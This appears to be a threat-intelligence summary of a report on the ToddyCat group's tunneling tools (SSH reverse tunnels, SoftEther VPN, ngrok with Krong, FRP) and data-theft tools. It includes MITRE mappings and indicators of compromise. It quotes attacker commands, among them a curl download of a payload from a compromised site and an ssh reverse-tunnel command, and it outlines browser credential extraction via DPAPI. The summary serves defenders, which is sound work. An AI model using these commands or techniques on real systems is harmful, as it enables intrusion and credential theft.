Keypoints
- Attackers deploy multiple, redundant tunneling mechanisms (OpenSSH reverse tunnels, SoftEther VPN, ngrok + Krong, FRP) to maintain access and route C2 or service traffic into target networks.
- Initial tool transfer and remote execution are accomplished using SMB/Windows admin shares and high-privileged credentials via PsExec or Impacket.
- For SSH tunneling, private keys are hidden in C:WindowsAppReadiness and protected by an a.bat script that changes DACLs; SSH is launched via scheduled tasks to create remote port forwards (ssh -R).
- SoftEther VPN Server (vpnserver_x64.exe + hamcore.se2) is deployed (often renamed) and configured with vpn_server.config entries pointing to attacker infrastructure (e.g., ha.bbmouseme[.]com / 118.193.40.42).
- Ngrok is used to expose local ports to cloud endpoints; the Krong DLL is side-loaded into a signed application to proxy/encrypt traffic (simple XOR) over that channel.
- Data collection tooling includes cuthead (file search by extension/date → ZIP with password “Unsafe404”), WAExp (collects web.whatsapp.com local storage), and TomBerBil (impersonates users to decrypt browser master keys and extract Logins/Cookies via DPAPI).
- Indicators include file hashes for WAExp/cuthead/TomBerBil/Krong, legitimate-tool hashes (ngrok, vpnserver), C2 IPs (103.27.202.85, 118.193.40.42) and download URLs (netportal.or[.]kr, etracking.nso.go[.]th).
MITRE Techniques
- [T1021.002] Remote Services: SMB/Windows Admin Shares – Used to move tool binaries and configuration files to victims (‘The attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote Services: SMB/Windows Admin Shares)’).
- [T1105] Ingress Tool Transfer – Downloading and staging tooling from attacker-controlled hosts using curl (‘”cmd.exe” /C curl http://www.netportal.or[.]kr/common/css/main.js -o c:windowsdebugwiawia.exe’).
- [T1572] Protocol Tunneling – Creating reverse SSH tunnels and VPNs to redirect service ports and access internal services (‘This connection will redirect network traffic from a certain port on the server to a certain port on the infected host’).
- [T1053.005] Scheduled Task – Scheduling a task to start an SSH reverse tunnel persistently (‘C:PROGRA~1OpenSSHssh.exe -i C:WindowsAppReadinessvalue.dat … -fN’).
- [T1543.003] Create or Modify System Process: Windows Service – Installing FRP or other proxies as services to maintain persistent reverse-proxying (‘after copying the files to the target host, the attackers create a service with an arbitrary name … c:windowsdebugtck.exe -c c:windowsdebugtc.ini’).
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Krong is loaded via DLL side-loading into a signed application to run the proxy component (‘Krong is a DLL file side-loaded … with a legitimate application digitally signed by AVG TuneUp’).
- [T1005] Data from Local System – cuthead recursively searches local drives for files matching extensions/date criteria to collect documents (‘begins a recursive search for files in the file system on all available drives (T1005 Data from Local System)’).
- [T1560.002] Archive Collected Data: Archive via Library – Collected files are archived programmatically (SharpZipLib / System.IO.Compression) and often password-protected (‘creates ZIP archives with the password “Unsafe404″‘).
- [T1555.003] Credentials from Web Browsers – TomBerBil impersonates users and decrypts browser master keys via DPAPI to extract stored credentials and cookies (‘to extract cookies and passwords from Chrome and Edge’ and it calls the Unprotect function to decrypt the encrypted_key field).
Indicators of Compromise
- [File hashes] Samples and backdoors – 1D2B32910B500368EF0933CDC43FDE0B (WAExp), AFEA0827779025C92CAB86F685D6429A (cuthead), 750EF49AFB88DDD52F6B0C500BE9B717 (TomBerBil), and additional hashes listed in the report.
- [Legitimate-tool hashes] Repurposed/renamed binaries – 9DC7237AC63D552270C5CA27960168C3 (ngrok.exe), 1F514121162865A9E664C919E71A6F62 (vpnserver_x64.exe), and other legit tool hashes used by the attackers.
- [C2 IPs / Servers] Remote infrastructure – 103[.]27.202[.]85 (SSH server used for reverse tunnels), 118[.]193.40[.]42 (SoftEther VPN server), and domain ha[.]bbmouseme[.]com (SoftEther config hostname).
- [Download URLs / Domains] Staging resources – hxxp://www.netportal.or[.]kr/common/css/main.js (vpnserver_x64.exe), hxxp://www.netportal.or[.]kr/common/css/ham.js (hamcore.se2), and hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 (Hamcore.se2).
ToddyCat operators typically arrive with high-privilege credentials and stage tooling via SMB shares or direct downloads (curl), often using PsExec/Impacket to run commands remotely. For persistent remote access they deploy multiple tunneling mechanisms: OpenSSH reverse tunnels with private keys hidden under C:WindowsAppReadiness (private keys given .ini/.dat extensions) and launched via scheduled tasks (ssh -R … -fN), SoftEther VPN Server (vpnserver_x64.exe + hamcore.se2) installed/renamed and configured via vpn_server.config entries (e.g., ha.bbmouseme[.]com → 118.193.40.42), ngrok agents to expose local ports to cloud endpoints, and FRP clients installed as services to reverse-proxy internal ports. Krong is used as a lightweight XOR-proxy and is DLL side-loaded into a signed host binary to avoid detection.
For data collection and exfiltration they employ specialized tools: cuthead (a .NET searcher that recursively finds files by extension/date, excludes system folders, and archives results using SharpZipLib with the password “Unsafe404”), WAExp (collects web.whatsapp.com local storage from Chrome/Edge/Firefox/Thunderbird and archives via System.IO.Compression.ZipFile), and TomBerBil (impersonates users by enumerating explorer.exe instances, reads the browser Local State encrypted_key, calls DPAPI via Unprotect to decrypt master keys, and extracts Login Data and Cookies via SQL queries). Additional methods include creating volume shadow copies and archiving User Data with 7-Zip for bulk exfiltration. Read more: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/